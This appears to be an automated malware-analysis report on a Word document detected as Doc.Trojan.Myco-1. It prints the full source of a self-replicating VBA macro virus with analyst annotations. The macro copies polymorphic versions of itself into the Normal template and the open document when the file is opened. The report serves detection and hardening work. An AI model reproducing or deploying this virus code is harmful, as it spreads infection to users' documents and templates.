MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
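The file contains a VBA macro that runs automatically through the Document_Open subroutine. The report attributes obfuscation and a potential second-stage download to this macro on the basis of the ClamAV detection name 'Doc.Trojan.Myco-1'. The extracted source shown below, however, contains no network or download calls. What it visibly does is rebuild its own code with randomly chosen object paths, overwrite the first code module of both the active document and the Normal template with that copy, and re-save the document. That is the behaviour of a self-replicating macro virus that persists through the global template (compare ATT&CK T1137.001, Office Template Macros). The presence of the Document_Open macro and VBA code strongly suggests a malicious document intended for initial compromise via spearphishing, although the delivery route is inferred from the file type rather than shown by the sample.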
Heuristics 3
-
ClamAV: Doc.Trojan.Myco-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Myco-1
-
VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
-
Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2914 bytes |

SHA-256: 62de67d8cf3d330296c24ccb1a509e0a69fb5d99ece16d83f97b824a793e558b
|||
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst annotations: every line that starts with an apostrophe was added for
' review and is not part of the extracted sample. The SHA-256, the byte size and
' the macro's own Lines(1, 33) self-read all refer to the unannotated source.
'
' Summary: Document_Open is the handler Word runs when the document is opened.
' This handler builds a fresh copy of its own source, replaces the code of the
' active document's and the Normal template's first code module with that copy,
' and saves the document. No file, shell, or network call appears in this listing.
'
' NOTE(review): every replication step goes through the VBProject object model.
' Word permits that only when "Trust access to the VBA project object model" is
' enabled, so that setting is a relevant hardening and triage check.
Private Sub Document_Open()
' Four tables of string fragments, used only to assemble statement text.
Dim A(1 To 9) As String
Dim B(1 To 9) As String
Dim C(1 To 4) As String
Dim D(1 To 6) As String
' A(): nine differently qualified spellings of a reference to the active document.
A(1) = "ActiveDocument"
A(2) = "Word.ActiveDocument"
A(3) = "Application.ActiveDocument"
A(4) = "Word.Application.ActiveDocument"
A(5) = "System.Application.ActiveDocument"
A(6) = "AddIns.Application.ActiveDocument"
A(7) = "Bookmarks.Application.ActiveDocument"
A(8) = "Documents.Application.ActiveDocument"
A(9) = "Word.System.Application.ActiveDocument"
' B(): the same nine spellings, pointing at the Normal template instead.
B(1) = "NormalTemplate"
B(2) = "Word.NormalTemplate"
B(3) = "Application.NormalTemplate"
B(4) = "Word.Application.NormalTemplate"
B(5) = "System.Application.NormalTemplate"
B(6) = "AddIns.Application.NormalTemplate"
B(7) = "Bookmarks.Application.NormalTemplate"
B(8) = "Documents.Application.NormalTemplate"
B(9) = "Word.System.Application.NormalTemplate"
' C(): four spellings that select a VBA component, by index 1 or by the name "ThisDocument".
C(1) = ".VBProject.VBComponents(1)"
C(2) = ".VBProject.VBComponents.Item(1)"
C(3) = ".VBProject.VBComponents(""ThisDocument"")"
C(4) = ".VBProject.VBComponents.Item(""ThisDocument"")"
' D(1) holds the text of the MyCode assignment itself, so that a regenerated copy
' can regenerate in turn.
D(1) = "MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 33) & vbCrLf & D(1) & vbCrLf & D(2) & vbCrLf & D(3) & vbCrLf & D(4) & vbCrLf & D(5) & vbCrLf & D(6) & vbCrLf & ""End Sub"""
' D(2)-D(6) are statement text, not executed here. They are built from randomly
' indexed fragments: Int((Rnd * 8) + 1) yields 1-8, Int((Rnd * 3) + 1) yields 1-3
' and Int((Rnd * 2) + 1) yields 1-2.
' D(2)/D(3): delete every line of the active document's component, then add MyCode to it.
D(2) = A(Int((Rnd * 8) + 1)) & C(Int((Rnd * 3) + 1)) & ".CodeModule.DeleteLines 1, " & A(Int((Rnd * 2) + 1)) & C(Int((Rnd * 2) + 1)) & ".CodeModule.CountOfLines"
D(3) = A(Int((Rnd * 8) + 1)) & C(Int((Rnd * 3) + 1)) & ".CodeModule.AddFromString MyCode"
' D(4)/D(5): the same delete-then-add pair, aimed at the Normal template's component.
D(4) = B(Int((Rnd * 8) + 1)) & C(Int((Rnd * 3) + 1)) & ".CodeModule.DeleteLines 1, " & B(Int((Rnd * 2) + 1)) & C(Int((Rnd * 2) + 1)) & ".CodeModule.CountOfLines"
D(5) = B(Int((Rnd * 8) + 1)) & C(Int((Rnd * 3) + 1)) & ".CodeModule.AddFromString MyCode"
' D(6): save the active document under its own current full name.
D(6) = A(Int((Rnd * 8) + 1)) & ".SaveAs FileName:=" & A(Int((Rnd * 8) + 1)) & ".FullName"
' MyCode = the first 33 lines of this module, then the six generated statements, then "End Sub".
' Presumably the 33 lines run from the Sub header through the D(6) assignment,
' on the assumption that the Attribute lines are not counted by CodeModule.
MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 33) & vbCrLf & D(1) & vbCrLf & D(2) & vbCrLf & D(3) & vbCrLf & D(4) & vbCrLf & D(5) & vbCrLf & D(6) & vbCrLf & "End Sub"
' The five statements below have the same shape as D(2)-D(6). Presumably they are
' the instance written by the copy that produced this sample. Their object
' qualifiers vary between copies, so detection content is better anchored on the
' fixed first 33 lines and on the CodeModule.DeleteLines / AddFromString pattern.
' Clear the active document's "ThisDocument" module, using the line count of component 1.
' (presumably the same component - confirm)
Application.ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, Word.ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
' Write the regenerated copy into the active document's first component.
Documents.Application.ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString MyCode
' Clear the Normal template's "ThisDocument" module.
System.Application.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
' Write the copy into the Normal template's first component. This is the persistence step.
Word.Application.NormalTemplate.VBProject.VBComponents(1).CodeModule.AddFromString MyCode
' Save the active document over itself, so that the rewritten macro is stored in the file.
System.Application.ActiveDocument.SaveAs FileName:=AddIns.Application.ActiveDocument.FullName
End Sub
|
|||